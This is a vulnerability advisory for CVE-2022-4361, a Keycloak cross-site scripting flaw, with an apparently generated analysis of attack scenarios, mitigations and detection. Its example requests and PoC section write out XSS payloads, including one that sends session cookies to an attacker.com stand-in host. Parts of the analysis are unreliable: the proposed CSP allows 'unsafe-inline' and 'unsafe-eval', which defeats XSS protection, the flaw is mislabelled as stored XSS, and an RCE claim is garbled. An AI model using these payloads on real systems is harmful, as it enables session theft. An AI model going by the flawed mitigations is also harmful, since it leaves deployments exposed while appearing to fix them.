CVE-2022-4361
CVE-2022-4361
Weakness (CWE)
CVSS Vector
v3.1- Attack Vector
- Network
- Attack Complexity
- Low
- Privileges Required
- None
- User Interaction
- None
- Scope
- Changed
- Confidentiality
- High
- Integrity
- High
- Availability
- High
Description
Keycloak, an open-source identity and access management solution, has a cross-site scripting (XSS) vulnerability in the SAML or OIDC providers. The vulnerability can allow an attacker to execute malicious scripts by setting the AssertionConsumerServiceURL value or the redirect_uri.
Comprehensive Technical Analysis of CVE-2022-4361 (Keycloak XSS Vulnerability)
1. Vulnerability Assessment and Severity Evaluation
CVE ID: CVE-2022-4361 CVSS Score: 10.0 (Critical) – AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H Vulnerability Type: Stored Cross-Site Scripting (XSS) via improper input validation in SAML/OIDC authentication flows.
Severity Justification:
- Attack Vector (AV:N): Exploitable remotely over the network without authentication.
- Attack Complexity (AC:L): Low complexity; no special conditions required.
- Privileges Required (PR:N): No privileges needed; unauthenticated attackers can exploit.
- User Interaction (UI:N): No user interaction required.
- Scope (S:C): Changes scope; impacts other components (e.g., client applications).
- Confidentiality (C:H), Integrity (I:H), Availability (A:H): High impact on all security objectives.
This vulnerability is critical due to its ability to facilitate unauthenticated remote code execution (RCE) in certain configurations, session hijacking, and privilege escalation within affected identity management systems.
2. Potential Attack Vectors and Exploitation Methods
Exploitation Mechanism:
The vulnerability arises from insufficient sanitization of the AssertionConsumerServiceURL (SAML) or redirect_uri (OIDC) parameters during authentication flows. An attacker can inject malicious JavaScript payloads that are stored and executed in the context of a victim’s browser when they interact with the Keycloak authentication endpoint.
Attack Scenarios:
-
SAML-Based Exploitation:
- An attacker crafts a malicious SAML authentication request with a manipulated
AssertionConsumerServiceURLcontaining an XSS payload. - When a victim accesses the Keycloak login page (e.g., via a phishing link), the payload executes in their browser.
- Example payload:
https://keycloak.example.com/auth/realms/master/protocol/saml?SAMLRequest=...&AssertionConsumerServiceURL=javascript:alert(document.cookie)
- An attacker crafts a malicious SAML authentication request with a manipulated
-
OIDC-Based Exploitation:
- An attacker manipulates the
redirect_uriparameter in an OIDC authorization request to include an XSS payload. - When the victim is redirected, the payload executes.
- Example payload:
https://keycloak.example.com/auth/realms/master/protocol/openid-connect/auth?response_type=code&client_id=app&redirect_uri=data:text/html,<script>alert(document.cookie)</script>
- An attacker manipulates the
-
Stored XSS via Malicious Identity Provider (IdP):
- If Keycloak is configured to trust an external IdP, an attacker could set up a rogue IdP that injects XSS payloads into SAML assertions or OIDC tokens.
- When Keycloak processes the response, the payload executes in the context of the Keycloak admin or end-user session.
Post-Exploitation Impact:
- Session Hijacking: Stealing session cookies (
KEYCLOAK_SESSIONorKEYCLOAK_IDENTITY) to impersonate users. - Privilege Escalation: If an admin’s session is compromised, an attacker could modify Keycloak configurations (e.g., adding malicious clients, modifying roles).
- Phishing & Credential Theft: Injecting fake login forms to harvest credentials.
- RCE in Certain Configurations: If Keycloak is integrated with a vulnerable frontend (e.g., React, Angular), an XSS could lead to DOM-based RCE via JavaScript execution.
3. Affected Systems and Software Versions
Vulnerable Versions:
- Keycloak versions before 20.0.3 (all prior releases, including 19.x, 18.x, etc.).
- Red Hat Single Sign-On (RH-SSO) 7.6 (based on Keycloak).
Affected Components:
- SAML Identity Provider (IdP) & Service Provider (SP) configurations.
- OIDC/OAuth2 authentication flows.
- Custom themes or extensions that process SAML/OIDC responses.
Not Affected:
- Keycloak 20.0.3 and later (patched).
- Deployments where SAML/OIDC is disabled or strict input validation is enforced.
4. Recommended Mitigation Strategies
Immediate Actions:
-
Apply the Patch:
- Upgrade to Keycloak 20.0.3 or later (or the latest stable release).
- For RH-SSO users, apply RHSA-2023:0001 or later security updates.
-
Temporary Workarounds (if patching is delayed):
- Input Validation & Sanitization:
- Implement strict allowlisting for
AssertionConsumerServiceURLandredirect_uriparameters. - Use Content Security Policy (CSP) headers to mitigate XSS impact:
Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; object-src 'none';
- Implement strict allowlisting for
- Disable Unused Protocols:
- If SAML/OIDC is not required, disable these authentication methods.
- Network-Level Protections:
- Deploy a Web Application Firewall (WAF) (e.g., ModSecurity with OWASP CRS) to block malicious SAML/OIDC requests.
- Input Validation & Sanitization:
-
Monitoring & Detection:
- Log and alert on suspicious
AssertionConsumerServiceURLorredirect_urivalues. - Use SIEM solutions (e.g., Splunk, ELK) to detect XSS payloads in authentication requests.
- Log and alert on suspicious
Long-Term Hardening:
- Regular Security Audits:
- Conduct penetration testing on Keycloak deployments, focusing on SAML/OIDC flows.
- Least Privilege Principle:
- Restrict Keycloak admin access and enforce multi-factor authentication (MFA).
- Secure Development Practices:
- Follow OWASP Secure Coding Guidelines for input validation.
- Use SAML/OIDC libraries with built-in security checks (e.g., OpenSAML, Spring Security).
5. Impact on the Cybersecurity Landscape
Broader Implications:
- Identity & Access Management (IAM) Risks:
- Keycloak is widely used in enterprise IAM, cloud-native applications, and DevOps pipelines. A critical XSS vulnerability in such a system undermines trust in federated authentication.
- Supply Chain Attacks:
- If Keycloak is used as an IdP for third-party services, exploitation could lead to cascading breaches (e.g., compromising multiple SaaS applications).
- Regulatory & Compliance Impact:
- Organizations using Keycloak may face GDPR, HIPAA, or PCI DSS violations if exploited, leading to data breaches and legal penalties.
- Exploitability in the Wild:
- Given the CVSS 10.0 score, this vulnerability is highly attractive to threat actors, including APT groups, ransomware operators, and cybercriminals.
Historical Context:
- Similar vulnerabilities (e.g., CVE-2020-10770, CVE-2021-20323) have been exploited in real-world attacks targeting IAM systems.
- SAML/OIDC misconfigurations are a common attack vector in cloud environments (e.g., Golden SAML attacks in SolarWinds).
6. Technical Details for Security Professionals
Root Cause Analysis:
The vulnerability stems from improper handling of user-controlled input in:
- SAML
AssertionConsumerServiceURL(used in SAML authentication responses). - OIDC
redirect_uri(used in OAuth2/OIDC authorization flows).
Keycloak fails to properly sanitize these parameters before reflecting them in HTTP responses, allowing arbitrary JavaScript execution.
Proof-of-Concept (PoC) Exploitation:
-
SAML XSS Exploitation:
GET /auth/realms/master/protocol/saml?SAMLRequest=...&AssertionConsumerServiceURL=javascript:alert(1) HTTP/1.1 Host: keycloak.example.com- If Keycloak processes this request, the payload executes when the response is rendered.
-
OIDC XSS Exploitation:
GET /auth/realms/master/protocol/openid-connect/auth?response_type=code&client_id=app&redirect_uri=data:text/html,<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script> HTTP/1.1 Host: keycloak.example.com- When the victim is redirected, the script executes, exfiltrating session cookies.
Patch Analysis:
The fix (commit a1cfe6e24e5b34792699a00b8b4a8016a5929e3a) introduces:
- Strict URL validation for
AssertionConsumerServiceURLandredirect_uri. - Output encoding to prevent script execution.
- Additional checks for malformed SAML/OIDC requests.
Detection & Forensics:
- Log Analysis:
- Look for unusual
AssertionConsumerServiceURLorredirect_urivalues in Keycloak logs. - Example suspicious log entry:
WARN [org.keycloak.saml.SAMLRequestParser] (default task-1) Invalid AssertionConsumerServiceURL: javascript:alert(1)
- Look for unusual
- Network Forensics:
- Inspect SAML/OIDC traffic for encoded XSS payloads (e.g.,
javascript:,data:text/html).
- Inspect SAML/OIDC traffic for encoded XSS payloads (e.g.,
- Endpoint Detection:
- Monitor for unexpected JavaScript execution in Keycloak admin or user sessions.
Conclusion & Recommendations
CVE-2022-4361 is a critical XSS vulnerability in Keycloak that poses severe risks to organizations relying on federated authentication. Due to its low attack complexity, unauthenticated exploitation, and high impact, immediate patching is mandatory.
Key Takeaways for Security Teams:
✅ Patch immediately to Keycloak 20.0.3 or later. ✅ Enforce strict input validation for SAML/OIDC parameters. ✅ Deploy WAF rules to block malicious authentication requests. ✅ Monitor for exploitation attempts via SIEM and log analysis. ✅ Conduct a security audit of Keycloak deployments to identify misconfigurations.
Failure to mitigate this vulnerability could result in session hijacking, privilege escalation, and full system compromise, making it a top priority for remediation.